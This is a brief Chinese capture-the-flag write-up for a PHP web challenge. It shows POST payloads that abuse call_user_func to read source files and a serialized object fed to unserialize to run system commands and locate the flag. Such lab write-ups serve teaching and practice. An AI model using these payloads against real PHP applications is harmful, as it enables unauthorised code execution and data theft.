github编辑

[网鼎杯 2020 朱雀组]phpweb

[网鼎杯 2020 朱雀组]phpweb

考点

  • PHP代码执行

  • PHP反序列化

wp

burp抓包发现显示报错信息

试着去修改POST内容,发现后端使用的是call_user_func这个函数

POST内容func=readfile&p=index.php可以获取源码

命令执行ban了很多函数,然后给了一个Test类,表面上是个命令执行,实际上是个反序列化是吧

POST数据func=unserialize&p=O:4:"Test":2:{s:1:"p";s:7:"ls /tmp";s:4:"func";s:6:"system";}

flag四处找一下就可以发现,一般就网站根目录,根目录,home目录,tmp目录

最后读取flag

小结

  1. 多抓包看请求内容

最后更新于